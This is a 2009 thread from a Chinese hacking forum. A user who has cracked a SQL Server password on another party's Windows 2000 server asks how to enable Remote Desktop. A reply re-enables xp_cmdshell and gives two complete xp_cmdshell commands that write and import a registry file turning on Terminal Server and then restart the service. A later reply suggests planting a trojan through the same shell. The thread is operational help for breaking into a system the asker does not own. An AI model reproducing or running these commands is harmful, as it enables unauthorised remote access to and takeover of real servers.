Board logo

标题: 如何开3389啊 [打印本页]

作者: 业余人    时间: 2009-6-9 16:09     标题: 如何开3389啊

我用WINNTAutoAttack扫到sql口令
  但没开3389  怎样在WINNTAutoAttack上的sqlcmd上开启3389啊
求助啊
作者: 业余人    时间: 2009-6-9 16:11

补充  看了他的c盘 没有Documents and Settings
作者: 柔肠寸断    时间: 2009-6-9 23:08

不同的系统有不同的方法。。
作者: saitojie    时间: 2009-6-10 16:46

能使用基于SQL的shell吗?也就是大家熟悉的"xp_cmdshell",如果不能使用,尝试下exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'看看能不能恢复,如果可以,再尝试使用这个shell编写一个批处理,直接对注册表进行操作,然后开启对方的3389。
作者: 业余人    时间: 2009-6-10 16:59

有那个sql的shell 对方是win2000server
  你能不能说的详细点阿   谢了
    我是菜鸟啊
作者: saitojie    时间: 2009-6-10 18:01

我记不得太多了,因为现在手里的不是XP就是2003的系统,所以只能按照自己的模糊的记忆给你点提示了,不保证完全成功,你可以试试!
分别执行
命令一:
  1. exec [master].[dbo].[xp_cmdshell] 'cd \ && c: && echo Windows Registry Editor Version 5.00 > 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 1.reg && echo "ShutdownWithoutLogon"="0" >> 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 1.reg && echo "EnableAdminTSRemote"=dword:00000001 >> 1.reg && echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 1.reg && echo "TSEnabled"=dword:00000001 >> 1.reg && echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 1.reg && echo "PortNumber"=dword:00000D3D >> 1.reg'
复制代码
命令二:
  1. exec [master].[dbo].[xp_cmdshell] 'regedit /s c:\1.reg && net stop "Terminal Server" && net start "Terminal Server"'
复制代码
给你写了两条命令,这两条命令全部是在SQL的shell里面使用的,由于写的比较急,可能还存在问题吧,你可以试试!
作者: 业余人    时间: 2009-6-11 15:55

哦 非常谢谢
作者: 业余人    时间: 2009-6-11 17:40

我连了 可问题又来了 我输入正确的用户名密码后 提示用户名或密码错误
  对方是内网   不知道和这个有没有关系
作者: saitojie    时间: 2009-6-12 19:32

还提醒你一下,既然你都能执行xp_cmdshell了,为什么你还要去开别人的3389,还要去想办法主动连接别人,你就不能直接弄个马上去,使用xp_cmdshell执行了搞定吗?
何必这么麻烦!?




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2